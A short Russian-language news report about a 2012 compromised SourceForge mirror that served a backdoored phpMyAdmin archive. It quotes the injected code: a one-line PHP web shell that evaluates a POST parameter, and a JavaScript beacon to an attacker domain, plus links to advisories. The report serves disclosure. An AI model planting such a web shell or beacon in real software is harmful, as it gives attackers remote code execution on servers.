- PVSM.RU - https://www.pvsm.ru -
25 сентября стало известно о компрометации одно из корейских зеркал SourceForge (cdnetworks-kr-1).
В архив phpMyAdmin-3.5.2.2-all-languages.zip, находящийся на этом зеркале был внедрен бэкдор.
В архив был добавлен файл server_sync.php, содержащий код:
<?php @eval($_POST['c']);?>
позволяющий исполнение произвольного кода.
Также, был модифицирован файл js/cross_framing_protection.js, в него был добавлен код:
var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);
позволяющий злоумышленнику узнавать о зараженных копиях.
На данный момент скомпрометированное зеркало исключено из ротации.
Команда SourceForge по логам определила, что количество скачавших этот файл около 400 человек. Всем скачавшим, кого удалось идентифицировать, на email было отправлено предупреждение.
Эксплоит для этой уязвимости уже попал в состав пакета Metasploit.
Источники:
phpMyAdmin corrupted copy on Korean mirror server [1]
PMASA-2012-5 [2]
Compromised SourceForge mirror [3]
Add exploit for phpmyadmin backdoor [4]
Автор: truezemez
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/phpmyadmin/15967
Ссылки в тексте:
[1] phpMyAdmin corrupted copy on Korean mirror server: http://sourceforge.net/blog/phpmyadmin-back-door/
[2] PMASA-2012-5: http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php
[3] Compromised SourceForge mirror: http://blog.cihar.com/archives/2012/09/26/compromised-sourceforge-mirror/?utm_source=rss2
[4] Add exploit for phpmyadmin backdoor: https://github.com/rapid7/metasploit-framework/commit/3ade5a07e7bb1b1f915a6421f3f1df0895e6f16d
Нажмите здесь для печати.